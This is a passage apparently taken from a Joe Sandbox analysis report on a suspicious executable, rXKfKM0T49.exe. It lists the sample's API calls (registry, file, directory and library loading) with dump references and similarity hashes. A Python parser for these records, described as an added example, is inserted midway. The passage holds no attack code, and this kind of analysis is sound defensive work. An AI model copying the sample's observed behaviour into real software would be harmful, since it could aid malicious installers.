  • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
  • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
  • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
• LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
• FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID:
• API String ID: 334405425-0
• Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
• Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
• Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
• Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
APIs
• RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
• RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000000,00000011,00000002), ref: 00402557
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: Enum$CloseValue
• String ID:
• API String ID: 397863658-0
• Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
• Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
• Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
• Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
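The "APIs" records above all use one line shape: an optional "Part of subcall function XXXXXXXX:" prefix, then API.MODULE, an optional parenthesised argument list in which "?" marks an unresolved value, and "ref: XXXXXXXX" for the call site. When triaging many such records it is useful to pull them into structured form, for example to read off the top-level call sequence or to spot arguments that are pointers back into the loaded image. The following Python parser is an added example and is not part of the Joe Sandbox report or its tooling. The sample lines are copied from the records on this page; the image base 0x400000 comes from the "Offset: 00400000" field, while the upper bound 0x455000 (start of the last associated dump) is an assumption, not a value the report states.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: four "APIs" lines copied verbatim from the function
# records on this page (the indented line is a "Part of subcall function" entry).
SAMPLE = r"""
• GetTickCount.KERNEL32 ref: 004032F2
  • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
• SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000000,00000011,00000002), ref: 00402557
"""

# One report line: optional subcall prefix, API.MODULE, optional (args), ref: address.
LINE_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Image range of the dumped module: the base 0x400000 is the report's
# "Offset: 00400000"; the upper bound is the start of the last associated dump
# (0x455000) and is an assumption, not a value the report states.
IMAGE_LO = 0x400000
IMAGE_HI = 0x455000


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str] = field(default_factory=list)
    ref: int = 0
    subcall_of: Optional[int] = None  # parent function when listed as a subcall


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullet lines of one 'APIs' record into ApiCall objects.

    Lines that do not match the shape (headings, blank lines) are skipped.
    """
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), parent))
    return calls


def call_sequence(calls: List[ApiCall], include_subcalls: bool = False) -> List[str]:
    """Return API names in report order, optionally including subcall entries."""
    return [c.api for c in calls if include_subcalls or c.subcall_of is None]


def image_pointers(call: ApiCall, lo: int = IMAGE_LO, hi: int = IMAGE_HI) -> List[int]:
    """Arguments that are 32-bit hex constants pointing inside the module image.

    '?' (unresolved) and non-hex arguments such as file paths are ignored.
    """
    out = []
    for a in call.args:
        if HEX32_RE.match(a):
            v = int(a, 16)
            if lo <= v < hi:
                out.append(v)
    return out


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE):
        where = f" (subcall of {c.subcall_of:08X})" if c.subcall_of else ""
        ptrs = ", ".join(f"{p:08X}" for p in image_pointers(c))
        print(f"{c.ref:08X} {c.module}!{c.api}{where} image-ptr args: [{ptrs}]")
```

Feeding a whole record's bullet lines through parse_api_lines gives the call order the sandbox observed for that function; call_sequence without subcalls is the list the report summarises in its "API ID" field, and image_pointers separates in-image addresses (candidate buffers or callbacks) from flag values and handles.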
APIs
• SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
• Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
• Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
• Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
APIs
  • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405D76
  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
  • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
• SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: CharNext$Directory$AttributesCreateCurrentFile
• String ID:
• API String ID: 1892508949-0
• Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
• Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
• Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
• Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
• RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspC239.tmp,00000000,00000011,00000002), ref: 00402557
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: CloseQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3356406503-0
                                                                                                            • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                            • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                            • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                            APIs
                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2831762973-0
                                                                                                            • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                            • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                              • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                            • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\rXKfKM0T49.exe,80000000,00000003), ref: 00405EE2
                                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                            • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                            • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                            APIs
                                                                                                            • EnumWindows.USER32(00000000), ref: 70092B6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnumWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 1129996299-0
                                                                                                            • Opcode ID: fbe81cca3ce63233e93d6ca77eeeefbb2f8dd75c85b7eb2eb4a0dd4f70aee2d5
                                                                                                            • Instruction ID: 6779a5745e932a0618e7a6832aedf376df9a434e158e17617019e2c64eba9dab
                                                                                                            • Opcode Fuzzy Hash: fbe81cca3ce63233e93d6ca77eeeefbb2f8dd75c85b7eb2eb4a0dd4f70aee2d5
                                                                                                            • Instruction Fuzzy Hash: 0641BFB3420204DFEB21DF77DD42B4D37A5FB84B35F32442AF501A6121E734A881AB9A
                                                                                                            APIs
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileMove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3562171763-0
                                                                                                            • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                            • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
APIs
• SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
  • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: FilePointerwsprintf
• String ID:
• API String ID: 327478801-0
APIs
• RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FF7C,0040CED0,004033DE,0040CED0,0040FF7C,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
Memory Dump Source
